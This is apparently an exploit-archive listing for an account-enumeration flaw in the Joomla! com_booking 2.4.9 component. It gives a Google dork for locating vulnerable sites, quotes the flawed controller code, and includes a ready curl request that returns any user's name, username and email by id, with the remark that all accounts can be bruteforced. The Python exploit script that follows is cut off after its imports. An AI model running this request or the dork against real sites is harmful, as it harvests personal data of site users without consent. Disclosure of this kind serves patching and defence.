Exploits / Vulnerability Discovered : 2023-07-19 |
Type : webapps |
Platform : php
This exploit / vulnerability Joomla! com_booking component 2.4.9 information leak (account enumeration) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)
# Google Dork: inurl:"index.php?option=com_booking"
# Date: 07/12/2023
# Exploit Author: qw3rTyTy
# Vendor Homepage: http://www.artio.net/
# Software Link: http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download
# Version: 2.4.9
# Tested on: Slackware/Nginx/Joomla! 3.10.11
#
##
# File: site/booking.php
#
# <?php
# [...]
#18 include_once (JPATH_COMPONENT_ADMINISTRATOR . DS . 'booking.php');
# [...]
#
# File: admin/booking.php
#
# <?php
# [...]
#104 if (class_exists(($classname = AImporter::controller()))) {
#105 $controller = new $classname();
#106 /* @var $controller JController */
#107 $controller->execute(JRequest::getVar('task'));
#108 $controller->redirect();
#109 }
# [...]
#
# File: admin/controllers/customer.php
#
# <?php
# [...]
#240 function getUserData() {
#241 $user = JFactory::getUser(JRequest::getInt('id'));
#242 $data = array('name' => $user->name, 'username' => $user->username, 'email' => $user->email);
#243 die(json_encode($data));
#244 }
# [...]
#
# A following GET request is equivalent to doing a query like 'SELECT name, username, email FROM abcde_users WHERE id=123'.
#
# curl -X GET http://target/joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=123
#
# So, an attacker can easily enumerate all accounts by bruteforcing.
#
##
import argparse
import urllib.parse
import requests
from sys import exit
from time import sleep